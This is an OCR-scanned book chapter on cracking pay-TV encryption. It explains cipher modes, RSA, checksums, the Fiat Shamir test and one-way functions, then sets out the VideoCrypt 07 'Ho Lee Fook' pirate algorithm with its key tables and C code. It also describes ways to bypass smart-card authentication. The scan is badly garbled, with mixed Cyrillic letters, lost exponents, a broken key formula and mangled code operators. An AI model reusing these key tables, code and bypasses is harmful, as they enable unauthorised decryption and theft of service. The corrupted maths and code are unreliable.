Electronic Code Book mode is more robust in terms of transmission. The 
longer between key changes in a system, the more robust that system is 
against sparklies. 


ө Cipher Block Chaining - CBC 


The principle behind CBC is simple. Each 64 bit plaintext input block is 
EXORed with the previous 64 bit ciphertext block. 


On the surface it appears straightforward. The problems lie in the beginning 
block and the fact that each output block is a function of all of the previous 
blocks. Since the first block has no previous ciphertext block, an initialising 
variable or block has to be used. 


Since all subsequent blocks are functions of the previous blocks, an error in 
one block will cause errors all of the subsequent blocks. The term for this is 
“error extension”. On encrypted audio this will show up as crackling. On 
encrypted video it shows up as sparklies. On data it requires the complete 
retransmission of the data. Error checking is carried out on the ciphertext 
rather than on the plaintext. 


ө Cipher Feedback - CFB 


Cipher Feedback mode is used where the plaintext used is continually less 
than a full 64 bit block. To reach a full block, the plaintext would have to be 
padded out with random data. Since the number of bits used is less than 64, 
the technique is commonly referred to as “M bit Cipher Feedback”. M is any 
number between 1 and 64. 
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In this mode, the input to the DES algorithm is the previous 64 bits of 
ciphertext. The input to the DES algorithm is held in a shift register that has 
an initial value at the start of transmission. The M bit plaintext is EXORed 
with the left most bits of the output of the DES algorithm. The ciphertext 
produced is then fed back into the shift register. 


ө Output Feedback - OFB 


Output Feedback mode uses the output of the DES algorithm as the 
feedback to the DES input shift register. This is referred to as “M Bit Output 
Feedback”. M is any number between 1 and 64. In this mode the output of 
the DES algorithm is EXORed with the M bit plaintext. 


If the receiver and transmitter lose synch then a new initial value must be 
inputted to the shift register. It is not necessary for the initial values to be 
encrypted. 
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The RSA Algorithm 


The RSA algorithm, or to give it its proper title, the Rivest Shamir Adlemann 
algorithm relies on the difficulty of factoring large numbers. Mathematically it 
is one of the simplest algorithms. Computationally, it can give a few 
problems. These problems can be overcome but the algorithm is slow 
compared to the DES. 


The RSA crypto system is a Public Key System. This means that one key is 
used to encrypt the data and another key is used to decrypt the data. The 
encryption key is a pair of integers (N,P). The decryption key is the integer 
pair (N,S). The integer S is kept secret. The integers N and P are published. 
This is the mathematical definition. From here on | will refer to S as the 
secret key, P as the public key and N as the address. 


Modulo arithmetic is used in the algorithm. For those who have temporarily 
forgotten how modulo arithmetic works this is a very brief explanation. In the 
example below, the modulus is the amount left over from the division of the 
nearest integer multiple of N. 


Thus if N=5 
17 Mod 5-2 
5*3= 15 
17 - 15 = 2 


There аге four basic elements іп the system. The first two elements аге 
prime numbers. (They are only divisible by themselves and one.) These will 
be called X and Y in the example. 


The third and fourth elements are the secret and public keys. The secret 
key is a prime number. The public key is chosen using the formula below. In 
the example, the secret key is S and the public key is called P. 


The product of the primes X and Y is also published. This is like the 
telephone number of the user. In the example this product is called N. 


X= Prime Number 1 S= Secret Key = Prime 

Y= Prime Number 2 P= Public Key 

N= X * Y P is chosen so that P * S Mod ((X-1)*(Y-1)) = 1 
P= ((X-1)*(Y-1))*1)/S 
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Encrypting: 
ciphertext = (plaintext Mod М 


Decrypting: 
plaintext = (ciphertext) Mod М 


As сап be seen from the above, it is simple in theory. To obtain the 
ciphertext from the plain text, raise the plaintext to the Pth power modulo N. 
To recover the plaintext from the ciphertext, raise the ciphertext to the Sth 
power modulo N. 


Worked Example Of RSA Algorithm 
X= 47 (Prime 1) S= 97 ( Secret Key - Prime ) 

Y= 79 (Prime 2) P= ((47-1)*(79-1))/97 = 37 

N= 47*79 = 3713 

Plaintext = AT 


To convert this into a simple numeric code, each letter of the alphabet is 
assigned a number from 1 to 26. Therefore AT becomes 120. 


Encrypting: 
Raise 0120 to the 37th power modulo 3713 
ciphertext = 12037 Mod 3713 
ciphertext = 1404 


The method used to raise the plaintext to the 37th power modulo 3713 is 
known as “Exponentiation By Repeated Squaring And Multiplication”. It is a 
very elegant mathematical short cut. Of course this is not the only algorithm 
that could have been used in this application. 


There are some good algorithms that could be used for implementing RSA 
in microcontroller software. The reason that the "Exponentiation By Re- 
peated Squaring And Multiplication" is used as an example is because it is 
easily understood and can be implemented in a high level language without 
great difficulty. 
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The “Exponentiation By Repeated Squaring And Multiplication” algorithm is 
shown below. 


The Algorithm 

To obtain MH Mod N 
Step 1: Display Н in its binary format. (H,-Ho) 
Step 2: Set C=1 
C= C2 = 1C Mod N 
C= C? = МС Mod N 
Note H, is always 1. 
Step 3: Set i=n where n is the number of digits in binary H. 
Step 4: Set C= Remainder when C? is divided by N 
Step 5: If Hi=1 then set C= Remainder when CM is divided by N 
Step 6: Decrement i by 1 
Step 7: Halt if i=1 else goto step 4 


Applying this to the figures in the example gives; 
M=120, H=37 and N=3713 Binary H=100101 


Step 1: C=1 

C= 120C Mod 3713 = 120 Mod 3713 ..... 1 
1=6 

C= 1202 Mod 3713 = 3261 Mod 3713 ..... 0 
1=5 

С= 32612 Моа 3713 = 89 Моа 3713 ..... 0 
1=4 

С= 892 Моа 3713 = 495 Моа 3713 

(495 * 120) Mod 3713 = 3705 Mod 3713 ..... 1 
і-3 

C= 37052 Mod 3713 = 64 Mod 3713 ..... 0 
і-2 

C= 642 Mod 3713 = 383 Mod 3713 

(383 * 120) Mod 3713 = 1404 ...... 1 
j=l 


Therefore 12037 Mod 3713 = 1404 
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Decrypting: 
To decrypt the ciphertext raise 1404 to the 97th power modulo 3713. 
plaintext = 140497 Mod 3713 
In this case M=1404, H=97 and N=3713 Binary H=1100001 


1404C Mod 3713 = 1404 Mod 3713 ..... 1 

C= 14042 Mod 3713 = 3326 Mod 3713 

(3326 * 1404) Mod 3713 = 2463 Mod 3713 ..... 1 
C= 2463? Mod 3713 = 3040 Mod 3713 ..... 0 

C= 30402 Mod 3713 = 3656 Mod 3713 ..... 0 

C= 36562 Mod 3713 = 3249 Mod 3713 ..... 0 

C= 32492 Mod 3713 = 3655 Mod 3713 ..... 0 

C- 3655? Mod 3713 - 3364 Mod 3713 

(3364 * 1404) Mod 3713 = 120 ...... 1 


Therefore plaintext=120 


The use of the "Exponentiation By Repeated Squaring And Multiplication" 
algorithm allows the whole process of implementing the RSA algorithm to 
be easily computerised. In fact a very simple BASIC program can be written 
for the implementation. 


The main factor in the security of the RSA algorithm is the size of the prime 
numbers used. These numbers are generally over a hundred digits long. A 
simple search of low primes would have revealed the values chosen in the 
example. A computer program to factor the address N would take less than 
a second. Once the primes X and Y are known, the value of the secret key 
S can be calculated by rearranging the formula used to obtain the public key 
P. In this case divide by P rather than S. 
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Authentication And Verification 


Authentication is now essential in crypto systems. The decoder or smart 
card must be able to verify that the packet of data it received was indeed 
sent by the headend and not by a hacker trying to interfere. It should not be 
possible to bypass the authentication procedure in the decoder. 


The significance of authentication has only been emphasised in the last few 
years by what happens when it is absent. The best example was the 
Phoenix hack on VideoCrypt that allowed the card to be activated for all 
channels. This happened because it was possible to send a properly 
authenticated message to the smart card and the smart card acted upon 
that message as it considered it to be genuine. 


If the hacker is able to bypass the authentication procedure, it is a disaster 
in terms of security. It basically means that the hacker has control over what 
goes on in the decoder. The best example of this can be found in the 
VideoCipher Il. VideoCipher ІІ was based on a hierarchical key set. A 
monthly key decoded the session key. The monthly key was transmitted in 
an encrypted form to each authorised decoder using that decoder’s unique 
key as the encryption key. The monthly key could be decrypted with a valid 
key. It did not matter that the key used in a descrambler was not the actual 
descrambler's key but one extracted from another descrambler. This was а 
disaster for VideoCipher ІІ and it was something that the system never fully 
recovered from. 


e Checksums 


A checksum is the first level of authentication on a packet of data. It 
basically ensures that the packet is intact. However it does not confirm that 
the packet has not been tampered with. 


Basically a checksum is a value that is obtained when the other bytes in the 
packet are subjected to some simple mathematical operation. The card or 
decoder can execute the same mathematical operation and should arrive at 
the same result as the checksum. 


The commonest forms of checksums are the Modulo Arithmetic checksum 
and the Cyclic Redundancy Check (CRC). Of the two the Modulo Arithmetic 
checksum is the fastest to implement. 


The simplest of these, the Modulo Arithmetic checksum is merely a value 
that is require to bring the sum of the bytes in the packet to a multiple of N. 
The result of a mod N operation should be zero for a valid packet. 
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However such a simplistic test cannot determine that a packet is valid. It will 
still give a valid result if the order of the bytes in the packet is changed. This 
type of checksum was used on the VideoCrypt system as the first level of 
authentication on the 74h packet. 


The Cyclic Redundancy Check is more complex. The data is expressed as 
a polynomial. This polynomial is then divided by a small fixed polynomial. 
The result of this division operation is CRC. This CRC data is then 
appended to the data. 


On the receiving end, the decoder divides the whole packet by the small 
fixed polynomial. The result if the packet is valid, should be zero. 


There are, of course, vulnerabilities. If the small fixed polynomial can be 
identified by a hacker, then it is possible to create properly checksummed 
packets. 


ө Signatures 


While the previous methods are good enough to form the first level of 
authentication, they are not ultimately secure enough. They a lot easier to 
hack than a properly constructed crypto signature. 


A signature system will be, theoretically at least, more difficult to hack and 
will form the last line of defence against the hacker spoofing the decoder 
with an unauthorised packet of data. 


The commonest option in scrambling systems is to use the actual main 
algorithm as the algorithm for generating the signature. This signature is 
often referred to as the Hash Signature or Hash Checksum. The use of the 
algorithm in this manner is economical. 


There are two approaches to using signatures in scrambling systems. The 
first and most obvious is to have a separate signature that is appended to 
the packet. The second is to have a signature that is part of the message 
used to generate the seed. 


In the EuroCrypt-M system, the key generation packet has an eight byte 
checksum appended. This checksum is passed through a modified version 
of the DES four times. 


In the 07 and 09 VideoCrypt system, the signature formed part of the seed 
generation data. The first 27 bytes of the packet were processed though the 
hash function. Then the four bytes of the hash signature were processed 
through the hash function twice. The result of the each cycle should equal 
the signature byte. 


6-22 


6: Cracking The Code 


RSA Signature 


This signature operation in RSA is relatively simple. The transmitter takes a 
message and raises it to the power of his Secret Key (S) modulo N. 


The receiver then uses the transmitters Public Key (P) to raise the 
ciphertext to the Pth power modulo N. The result is the plaintext message. 


The message could be a random piece of information or something such as 
the date or the channel number. There would be no real transfer of 
knowledge between the transmitter and the receiver. 


Transmitter: Published data= N, P 

Message = plaintext 

Encrypting: 

Ciphertext = plaintext? Mod N 

Decrypting: 

Receiver: Uses transmitter's М and P values to restore message. 
Plaintext = ciphertext? Mod N 


There are of course other methods of signing data. This RSA method is 
useful where there is a lot of computing power. However for smart card 
applications, where the eight bit processor still rules, other less cycle 
consuming algorithms are required. 


Fiat Shamir Zero Knowledge Test (ZKT) 


The Fiat Shamir Zero Knowledge Test is, according to VideoCrypt 
brochures, used to verify that the packets of information in the VideoCrypt 
access control system are valid and have not been tampered with. 


Unfortunately for News Datacom and the users of VideoCrypt, there was a 
flaw іп the implementation of the ZKT in the decoder's card interface 
microcontroller. The result of this flaw was that the decoder did not reject 
the pirate smart card. Had it done so, the 07 Ho Lee Fook would not have 
worked. 


The original paper on the algorithm was published in the proceedings of 
Crypto “86. The information outlined here is derived from a paper on ап 
Open Smart Card Interface for D2-MAC. The paper was published in 1991. 


The Fiat Shamir algorithm relies on the difficulty of factoring and extracting 
modulo square roots. Basically the look-up table R is never sent out of the 
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Smart Card 
R is the look-up table 


S is the card serial num 
er 


Generate X, V 
X=R2 mod N 
V=S2 mod N 


Decoder 


Modulus N 


Store X, V 


Send О Send X, V 


Generate Y 

If Q-00h then 
Y=R mod N 

If. Q-FFh then 
Y=(R*S) mod N 
Send Y 


Verify Procedure 
If Q-00h 
OK if: 





X-Y? mod N 
If Q-FFh The Fiat Shamir ZKT 


OK if: This test is very simple and 

= elegant. Its resilience lies in the 
a ды тон difficulty of factoring large num- 
bers. The look-up table, R, is 
never divulged by the card. 
Therefore the only approach 
would be to pop the smart card 
and extract the table. 
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smart card. The card serial number is, theoretically not supposed to be sent 
outside of the card. 


In the D2-MAC application outlined in the paper, the modulus, N, is a 64 
Byte number. This gives effectively 2513-1 numbers that can be used for 
the modulus. 


The modulus is of course a limiting factor on the size of the look-up table, R. 
If the modulus is greater than R then the result of R mod N is zero. The fact 
that R mod N is zero when the look-up table is a multiple of R could be 
considered as a guideline for a number crunching attack 


What the ZKT has in its favour is that the numbers involved are very large. 
Factoring algorithms are slow and as a result the chances of the look-up 
table R being discovered are not good. 


A potential weakness would be the reduction of the size of the look-up table 
and modulus. A number of computers working in parallel may just have the 
chance of producing the look-up table as the result of a guided Brute Force 
Attack. 


The ZKT was just one of the authentication routines mentioned. In this 
application it was to be used to authenticate the smartcard before the 
smartcard could proceed to decode the channel. The D2-MAC systems 
tend to go for a different security approach. Whereas in the VideoCrypt 
system it is the algorithm that is the most valuable aspect, it is the key tables 
that are the most valuable in D2-MAC systems. 


The problem with the Fiat Shamir ZKT algorithm as used in a scrambling 
system is that it depends on the security of the decoder as much as the 
card. It is therefore vulnerable. The decoder uses the ZKT to check if the 
card is a valid card. The first bypass for this was to set the pirate card 
software to give back an answer of zeroes. Of course a more elegant 
solution exists if the decoder's card interface microcontroller is compro- 
mised. 


The card interface microcontroller is generally the one that has to check the 
ZKT response of the card. It is also the one that controls the card - decoder 
traffic. Therefore if the software in this microcontroller can be rewritten so 
that it completely ignores the ZKT packet, the ZKT will never get to the card 
with the result that the card does not have to authenticate itself to the 
decoder. 


Of course there are ways around this hack for the systems designers. They 
could build the ZKT into the seed generation data. This way the ZKT data 
would have a second function. It would also mean that the packet containing 
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the ZKT would be necessary for the card. Otherwise the card would have no 
data with which to generate the seed. 


e Hash Functions and Message Digests 


A Hash function produces a fixed length output from a block of data. The 
length of the input can be fixed or variable. The hash output is commonly 
referred to as the hash value. Essentially the hash function produces what 
could be called a fingerprint of a block of data. When the function is hard to 
reverse, it can be referred to as a Message Digest. 


Reversing the hash should be extremely difficult. It should not be possible to 
rebuild the input data from the output. Another factor is that in an application 
such as smart card usage, the actual algorithm used for the hash should not 
be known. 


The reason for this is that if a single algorithm is used the system can be 
compromised if the algorithm is discovered. The hash is commonly used to 
prove that the addressing data and subscriber data is valid and has not 
been altered. 


One Way Functions 


A One Way Function is like a religious deity. It depends on faith for its 
existence. Without faith it is nothing. It does not exist. Of course like every 
religious deity, One Way Functions have their true believers and disbeliev- 
ers. 


Technically speaking, a One Way Function is a function that is extremely 
difficult, if not impossible, to reverse. The procedure can only go one way 
hence the name. 


The problem with the One Way Function is that the concept is fundamen- 
tally flawed. It rules out any future discovery or theory. It is too reminiscent 
of that Holy Grail, the unbreakable cipher. Normally when someone invents 
what they believe to be an unbreakable cipher, someone else is around to 
crack it. 


History is full of such cracked unbreakable ciphers. World War Two was a 
war where many key events and battles were decided by the intelligence 
gathered from codebreaking. Indeed there are indications that the attack on 
Pearl Harbour was expected as the Japanese diplomatic ciphers were 
being cracked by the Americans and the English. 
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The One Way Function has to be very difficult if not impossible to reverse. 
There are a number of methods that can be used to achieve this level of 
complexity. 


The first method is to design very complex algorithm or equation. This 
approach is fine if there is a lot of processing power in the electronics. This 
method may be more suited to personal computers or similar applications. 


The second method is to use a simple routine a number of times. The 
routine would be relatively short but the fact that it is repeated so many 
times would make the reversal extremely difficult. In terms of implementa- 
tion in a smart card this is the easiest. It is merely a question of setting a 
loop. 


The simplicity and elegance of the second method makes it ideal for 
implementation in a smart card. The majority of smart cards are still using 
eight bit processors. They also run at relatively slow clock speeds. 


The routine at the core of the One Way Function is perhaps the weakest 
link. If this routine is not properly designed then the number of times that it is 
used may be irrelevant. There could be a way of cracking it by comparison. 


Theoretically, the bits in the output of the One Way Function should have no 
visible relationship with each other. This of course would be the theoretical 
model. In the real world sacrifices to the demons of expediency have to be 
made. The processor word length is one of these sacrifices. 


With eight bit processors, it is possible to have sixteen bit wide registers so 
the output of the routine could be sixteen bits wide. With the limited RAM 
available on the smart card, this would be a rather inelegant implementation 
in terms of memory usage. Using an eight bit output each time would be far 
more elegant and a lot easier to implement. 


In the second method, the routine would be applied a number of times. A 
typical procedure would be to EXOR the output of the routine with the 
contents of the output block which in the smart card model would be a 
single byte. 


The output block is effectively the accumulation of all of the previous 
outputs of the routine. The initial state of the output block is zero. In 
mathematical terms it would be the modulo 2 sum of all of the routine's 
outputs. 


Unfortunately this model is rather simplistic and is also very vulnerable. The 
same keys are applied on a repeating basis. This makes the whole chain 
relatively linear. 
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The keys Ко - K, are selected on a repeating basis. Therefore there is a risk 
of a pattern developing. The keys would effectively become constants. It 
should be remembered that any potential cryptanalyst will have a large 
amount of ciphertext and its corresponding plaintext. 


It is therefore a good thing to include as many elements of non-linearity as 
possible in the model. The first step would be to make the selection of the 
keys non-linear. 


Since the application is smart card based, the memory available for key 
tables will be limited. By using a look-up routine to select the keys, a virtual 
key table many time the size of the original can be created. This look-up 
routine would make the process of cracking a lot harder. 


A good example of this type of thinking can be seen in the DES algorithm's 
key generation routine. The DES algorithm generates sixteen forty-eight bit 
keys from a single fifty-six bit key. This provides each round of the DES with 
its own key. 


Even when the model is updated, the process is still relatively linear. This 
chain is repeated for each block of the output. The function f is still uses the 
inputs from the key table and a known variable, the input data. Since the 
input data is a known factor, it could be used as a path of attack by any 
cryptanalyst. 


In terms of computer programming the model is very messy. The chain is 
repeated for every output block. In a situation that requires a multiple block 
output, for example one eight bytes wide, using a chain for each output 
block would be wasting processor time. It would also make each output 
block unique thus multiplying by eight the amount of information available to 
a cryptanalyst. If the complete number of output blocks formed one single 
output then things would be a lot more complicated. 


Again, the DES algorithm can be used for ideas. In the encryption and 
decryption rounds, part of the previous round's output is used as the input 
for the next round. A cipher that uses this procedure is called a Fiestel 
Cipher. It is an elegant method that increases the complexity of cracking the 
algorithm. The output of each round is effectively a product of the outputs of 
all the previous rounds. 


By feeding each output block into the function f to generate the next output 
block would change the program from a simple EXOR equation to a 
non-linear one. 


Many of these ideas about One Way Functions can be seen in the 
VideoCrypt 07 Ho Lee Fook algorithm. 
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PRNGs and PRBSGs 


A random number is a number selected at random from a possible set of 
numbers. There is apparently no chance of anybody predicting the next 
number that will be selected. That kind of thing is fine for Lottery tickets and 
such. In signal security, there is a demand for two or more random number 
generators to work in synch. This is impossible as they would not be 
generating random numbers. The compromise is a Pseudo Random 
Number Generator. 


A Pseudo Random Number Generator generates a sequence of numbers 
that appears to be chosen at random. In reality, it generates a sequence of 
numbers using a mathematical equation. A PRNG relates to a number with 
a specific maximum number of digits. This would mean that the output of 
the PRNG would be EXORed with the data on a parallel basis. While it is 
possible to fabricate PRNGS, it is easier to fabricate a PRBSG. 


In security applications, a Pseudo Random Binary Sequence Generator is 
used instead of a PRNG. The PRBSG generates a one bit wide output. This 
can be EXORed bitwise with the datastream. 


In terms of hardware, a PRBSG is easily implemented using some shift 
registers and an EXOR gate. At start up, the shift registers are filled with a 
key or seed value. The system clock then shifts the bits through the 
registers. The inputs to the EXOR gate are called the feedback points. 


The datastream produced by EXORing the output of the PRBSG with the 
data would then be harder to hack. Since the bit can only be one or zero and 
each bit in the new data stream can be one or zero, the prospective hacker 
would have to acquire a lot of the ciphertext and a lot of plaintext. Using 
some complicated statistical analysis and matrix algebra, the properties of 
the PRBSG may be deduced. These properties would be the length of the 
shift register and the feedback points of the PRBSG. He would still have to 
acquire the seed word. This is the data loaded into the shift registers when 
the PRBSG is initialised. This all assumes that the feedback logic is linear. If 
it is non-linear, then the task will be extremely difficult. 


PRBSGs are commonly used in digital audio applications to shape the 
spectrum of the signal. The use of the PRBSG allows the datastream to 
appear as random 15 and Os otherwise known as noise. 


While a purely mathematical approach to hacking a system by cracking the 
PRBSG is possible it is a case of failing to see the greater picture. As 
cracking the sequence will take time, the video or audio has to be delayed 
for that time. This is often not an economically viable hack. 
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The 07 Ho Lee Fook Algorithm 


Very few people know exactly when the 07 VideoCrypt smart card was 
hacked. The true story may never be disclosed and it probably would make 
a very good movie. There are many rumours and claims. Some claim it was 
all the work of one hacker. Others claim that the smart card itself was 
reversed. Either way the hack happened and the credibility of Sky and News 
Datacom was irretrievably shattered. 


When that aura of mystique is dispersed, the VideoCrypt system is at once 
simple and complex. It is simple in that the 07 implementation dangerously 
relied on a single layer of authentication. It is complex in that there are a lot 
of unused aspects. One Irish hacker summed it up in the following manner: 
"if it was any holier it'd be canonized. There are still too many unexplored 
avenues.” 


The algorithm that hacked the VideoCrypt system is embarrassingly simple 
in construction. At the heart is a core function. This algorithm takes the 
message block of thirty two bytes and transforms it into an eight byte 
decryption key. Though the core function is simple, the fact that it is 
repeated 99 times makes the procedure of mapping an eight byte 
decryption key back to the original thirty two byte message packet extremely 
difficult. 


This algorithm is more of a message digest than a true encryption system. It 
produces a digest of the thirty two byte packet. The packet contains the 
channel identification, time stamping and checksumming. In some respects 
this is an elegant solution to the problem of over the air addressing but in 
others it made the system totally vulnerable. 


The result of using a single packet for authentication, addressing, check- 
summing and key generation, means that the system only has one layer of 
authentication. Hack that and the system is wide open. As a direct result of 
this, the options to recover from a hack are drastically reduced. Though 
apparently the Fiat Shamir Zero Knowledge Test may be implemented in 
the 8052, it was not possible to use it. There was a bug in the majority of the 
first generation VideoCrypt decoders. This bug meant that the results of the 
Fiat Shamir ZKT would be ignored by the decoder. Otherwise things would 
have been very different. 


The fact that the decryption process can take place without a second layer 
of authentication points to a fundamental flaw in the design of VideoCrypt's 
access control. To put it simply: this hack should not have been possible 
with all of the claims that News Datacom made about their system. 
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The 07 HLF algorithm transforms a thirty two byte message packet, m(0 to 
31), into an eight byte decryption key, г(0 to 8). It is effectively a message 
digest. The core function, f, is non-linear in that it is difficult to reverse the 
function. If it was linear then it would be trivial to reverse. When there is an 
attempt to reverse the function, the result is not a unique result but rather a 
number of results. 


Sky are now using their issue 10 card and this algorithm does not work on 
the Sky channels any more. However this algorithm is still in use with the 
VideoCrypt-ll variant as used in mainland Europe and it is also still used on 
the Adult Channel, Eurotica and JSTV. Of course these channels do use 
different keytables. 


The examination of the 07 algorithm is in four stages. The first deals with 
the key selection and the compression of keys for use in limited memory 
microcontrollers such as the РІС16С54 and РІС16С84. 


The second stage examines the core function. This is the function at the 
heart of the 07 HLF algorithm. Essentially this is the main non-linear 
function in the algorithm. Trying to reverse the function produces a number 
of potential inputs that would provide the same result. 


The third stage examines the algorithm in operation. The function is actually 
used ninety nine times. This makes the whole process exceedingly difficult 
to reverse. 


1: Key Tables And Structures 


In the 07 HLF algorithm, the keytable is 256 bytes long. This is rather large 
when considered for use in PIC processors. As the memory in these 
microcontrollers is limited, the keytable has to be compressed. 


As it turns out, 256 is a very convenient number. It can be represented by 
two 16 byte arrays since 16 * 16 = 256. 


So therefore by adding an entry from each array, it is possible to regenerate 
a complete 256 entry array. In this situation, addition is used. Multiplication 
or subtraction or any other function could possibly be used. 


In the PIC implementation of the HLF algorithm, the key table is only 56 
bytes in length. This means that more than one 256 entry key table is stored 
in this 56 byte block. 
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HLF Key Table In Decimal HLF Key In Hexadecimal 
101 231 113 026 180 136 215 118 65 E7 71 1A B4 88 D7 76 
040 208 076 110 134 140 200 067 28 DO 4C 6E 86 8C C8 43 
169 236 096 066 005 242 061 028 A9 EC 60 42 05 F2 3D 1C 
108 188 175 195 043 181 220 144 6C BC AF C3 2B B5 DC 90 
249 005 234 081 070 157 226 096 F9 05 EA 51 46 9D E2 60 
112 082 103 038 097 073 066 009 70 52 67 26 61 49 42 09 
080 153 144 162 054 014 253 057 50 99 90 A2 36 OE FD 39 


Using the first thirty two bytes of the fifty six byte table, it is possible to 
generate the key values shown below. 

In Hexadecimal Format: 

Key. Col = (65, E7,71,1A4,B4,88,D7,76,28,D00,4C,6E,86,8C,C8,43) 
Key. Row = (A9,EC,60,42,05,F2,3D, 1C, 6C, BC, AF,C3,2B,B5,DC,90] 
key matrix 

Row x Column 

OF 91 1B C3 5E 32 81 20 D1 7A F5 18 30 36 72 EC 

52 D4 5E 07 A1 75 C4 63 15 BD 39 5B 73 79 B5 30 

C5 48 D1 7A 15 E8 38 D6 88 31 AC CE E6 EC 29 A3 

A7 2A B3 5C F6 CA 1A B8 6A 13 8E BO C8 CE 0B 85 

6A EC 76 1F B9 8D DC 7B 2D D5 51 73 8B 91 CD 48 

58 DA 64 OD A7 7B CA 69 1B C3 3F 61 79 7F BB 36 

A2 25 AE 57 F1 C5 15 B3 65 OE 89 AB C3 C9 06 80 

81 04 8D 36 DO A4 F3 92 44 EC 68 8A A2 A8 E4 5F 

D1 54 DD 86 21 F4 44 E2 94 3D B8 DA F2 F8 35 AF 

22 A4 2E D6 71 45 94 33 E4 8D 09 2B 43 49 85 FF 

15 97 21 C9 64 38 87 26 D7 80 FB 1E 36 3C 78 F2 

29 AB 35 DD 78 4C 9B 3A EB 94 10 32 4A 50 8C 07 

90 13 9C 45 DF B3 03 A1 53 FB 77 99 B1 B7 F3 6E 

1B 9D 27 CF 6A 3E 8D 2C DD 86 02 24 3C 42 7E F8 

42 C4 4E F6 91 65 B4 53 05 AD 29 4B 63 69 A5 20 

F5 78 02 AA 45 19 68 07 B8 61 DC FE 17 1D 59 D3 

This 256 entry key table could be stored in a single array where 


microcontroller memory is not a problem. As a number of key tables are 
stored in the 56 byte block, a separate 256 byte key table would have to be 
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stored for each entry. This is not a good method as a simple offset, as used 
in the algorithm would effectively create a new key table and a lot of hassle. 


Addressing this matrix is straightforward. Since the Row and Column values 
are the values of in the two sixteen byte arrays, they can each be defined in 
terms of a nybble or half of a byte. 


As was stated earlier, the 56 byte block can be used to generate a number 
of key tables. In the 07 it was used to generate three tables. In the example 
above, the first four rows were used to provide the two 16 byte arrays. By 
using an offset of 8 and an offset of 24, the two other new 256 entry key 
tables can be generated. 


Offset = 8 

Key. Col = (28,D0,4C,6E,86,8C,C8,43,A9,EC,60,42,05,F2,3D, 1C) 
Key. Row = {6C, BC, AF,C3,2B,B5,DC,90,F9,05,EA,51,46,9D,E2,60} 
Offset = 24 

Key. Col = {6C,BC,AF,C3,2B,B5,DC,90,F9,05,EA,51,46,9D,E2,60} 
Key. Row = {70, 52,67, 26,61,49, 42,09, 50,99, 90,A2, 36,0E, FD, 39} 


By using three offsets of 0, 8 and 24 respectively, the 56 byte table can be 
used to generate the three key tables. In their full expanded format, these 
tables would occupy 768 bytes. Some claimed that the 07 card contained 
the algorithms for the 06, 07 and 08 issue. It is unlikely that the 08 codes 
were included in the 07 card. In reality, the 07 card would have contained 
the 06 and 07 key tables and perhaps some more algorithms. The 08 card 
was just a modified 07 with some new key tables. This of course had to be 
dropped in favour of issue 09 after the catastrophic hack on the 07. It forced 
News Datacom to integrate some very clever tricks in the 09. 


It would appear that the method of addressing the key tables is similar to 
that used in the S-Box routines in the DES. However the S-Box routines are 
designed to be very tough. It is not known if the key tables are as tough or 
indeed as non-linear. 


Of course the standard fixed offset is a very conventional method of key 
generation. The system could be made more secure by using a pseudo- 
random offset for each packet. The 07 algorithm was a very basic 
implementation compared to the 09. 
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2: The 07 Core Function, f 


The 07 HLF algorithm produces an eight byte output from a thirty two byte 
input. There are eight byte wide registers r[0..7]. At any one time the 
function is working with two registers. 


The core function, f, operates in a byte wide manner. Each register is only 
eight bits wide and has no carry bit. This means that all of the operations are 
one byte wide. Operations like additions or multiplications will therefore be 
lossy. 


When two eight bit numbers are added, the result may be a nine bit number. 
As this function works in eight bits, this ninth bit is lost. To even reverse a 
simple multiplication by two of an eight bit number produces two possible 
inputs that would give the same result. 


In machine code, a multiplication by two simply involves shifting the bits in 
the eight bit register one bit towards the left so that a zero appears in the 
least significant bit. 


Example Of The Shift Left Operation: 
Binary Hex Decimal 
11011011 DB 219 

(1) 1011 0110 1B6 438 
10110110 B6 182 (ninth bit discarded) 


In this example, it can be seen that two multiply by two is merely a question 
of shifting all of the bits one step to the left. Of course to divide by two, it is 
necessary to shift the bits one step to the right. 


Since the ninth bit has been discarded, the divide by two will produce the 
following: 


Example Of The Shift Right Operation 
Binary Hex Decimal 

10110110 B6 182 

01011011 5B 91 (shift right by one bit) 


The problem is that we are not sure if the correct original value was 219 or 
91. Since the ninth bit is discarded, both values will produce a result of 182 
when multiplied by two. 
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The same arguments of bit loss apply with the simple addition of two eight 
bit numbers even when one of the numbers is known. There are two 


possible starting numbers. 


So by combining a sequence of multiplications and additions in a fixed 
length register, it is possible to create a function that, while not being 
impossible to reverse as a one way function is, leaves a lot of doubt over 
what the original starting value is. This is effectively how the core function in 
the VideoCrypt 07 hacker algorithm works. It has an elegant simplicity that 


belies its complexity. 


The fragment of C code below is the implementation of the core function. 


The input to the function, byte, is a byte from the message block. 
/* Core Function - 07 Algorithm */ 

void Owf(unsigned char byte) 

{ 

unsigned char acc, kpoint,k1,k2; 

/* Generate key */ 

r[Ppos]^-byte; 

kpoint=r[Ppos]; 

k1=key[Offset+(kpoint>4)]; 

k2=key[Offset+16+(kpoint&0x0f)]; 

acc=k1 + k2; 

acc=~acc; 

acc = (acc<1) | (acc>7); 

/* Apply function to message byte, key and register*/ 
acc*-byte; 

acc = (acc«1) | (acc>7); /*shift left */ 

acc = (асс>4) | (acc«4); /* swap nybbles */ 

Ppos++; /* increment Ppos */ 

Ppos&=7; /* this ensures that the value of Ppos is less than 8 /* 
{Рроѕ]^=асс; 


} 
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r[Ppos] is the byte wide output register where Ppos is the pointer to the 
relevant register. 


The first step in the function is to EXOR the message byte with the contents 
of the current output register r[Ppos]. This both changes the contents of the 
current output register r[Ppos] and creates a key pointer, kpoint. 


This key pointer, kpoint, is then used to select the bytes from the two 16 
byte arrays. The bytes are selected by using the high nybble to address the 
first array and and the low nybble to address the second array. The 
procedure was detailed earlier. The offset referred to is effectively the value 
to select the correct table from the 56 bytes. 


The two key bytes are then added. The result acc, is inverted and multiplied 
by two. This multiplication by two is the shift left routine. 


This key is then added to the message byte. The result is multiplied by two. 
Then the high nybble is swapped with the low nybble. 


The procedure to swap the nybbles is simple though in non programming 
terms it looks complex. Basically it is an extension of the shift right to divide 
and shift left to multiply concept. In order to divide by 16, we shift the bits to 
the right four times. The reason for this is that 24 = 16. To multiply, it is a 
case of shifting the bits to the left four times. The OR operation is necessary 
to integrate the results of the division by sixteen and the multiplication by 
sixteen into a single number. 


Example Of The Nybble Swap Operation: 
Binary Hex Decimal 

11011011 DB 219 Original Value 
00001101 00 13 Shift to right four times 
10110000 ВО 176 Shift to left four times 


The next procedure is to increment the Ppos pointer so that it points to the 
next r[Ppos]. The value of Ppos is checked to see that it is only points to one 
